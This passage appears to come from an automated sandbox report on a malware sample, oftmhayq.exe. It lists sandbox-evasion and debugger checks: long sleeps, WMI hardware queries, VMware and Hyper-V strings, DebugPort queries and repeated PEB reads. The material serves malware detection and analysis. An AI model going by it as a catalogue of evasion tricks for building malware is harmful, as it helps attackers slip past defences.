          Source: C:\Users\Public\oftmhayq.exe TID: 4472Thread sleep count: 63 > 30
          Source: C:\Users\Public\oftmhayq.exe TID: 2288Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\Public\oftmhayq.exe TID: 1012Thread sleep count: 34 > 30
          Source: C:\Users\Public\oftmhayq.exe TID: 6576Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe TID: 4020Thread sleep count: 59 > 30
          Source: C:\Users\Public\oftmhayq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Users\Public\oftmhayq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Windows\splwow64.exeLast function: Thread delayed
          Source: C:\Windows\splwow64.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000001F.00000000.510806745.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000014.00000002.442866575.000001D222633000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
          Source: oftmhayq.exe, 00000019.00000002.467738260.0000000003439000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: powershell.exe, 00000015.00000002.442626587.000001F6E4550000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000001F.00000000.501168197.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000001F.00000000.515471921.000000000F6C0000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&v
          Source: powershell.exe, 00000015.00000002.442626587.000001F6E4550000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000014.00000002.443094933.000001D222698000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\oftmhayq.exeProcess queried: DebugPort
          Source: C:\Users\Public\oftmhayq.exeProcess queried: DebugPort
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00409A90 rdtsc
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0130513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012F4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012F4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D3138 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012E0100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012DC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0139E962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012DB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013A8966 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_01391951 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012FB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D395E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012E61A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013099BC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0130C9BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013AF1B5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012F99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_01302990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_01304190 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012FC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0139A189 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0139A189 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D519E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D519E mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0130A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D8190 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012FD1EF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012DB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D31E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013A89E7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013919D8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012E99C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012EC1C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_01304020 mov edi, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0130002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012FA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_01357016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D6800 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0130701D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012FF86D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_01392073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_01391843 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D7057 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D5050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012E28AE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012E28AE mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0130F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0130F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D3880 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_01353884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012FB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012E28FD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0136B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D70C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013918CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D78D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D78D6 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0139B0C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0139131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_01303B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012DDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_01366365 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D7B70 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012EF370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013A8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012DDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012DF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013A9BBE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013A8BB6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_01391BA8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_01304BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013A5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0130B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_01302397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0139138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012FEB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0138D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D4B94 mov edi, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0130138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0137EB8A mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_0137EB8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012D1BE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_012FDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exe | Code function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013823E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013823E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013823E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013053C5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D4A20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D4A20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01314A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01314A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0131927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01364257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391A5F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D1AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013012BD mov esi, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013012BD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013012BD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01305AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01305AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139129A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130DA88 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130DA88 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
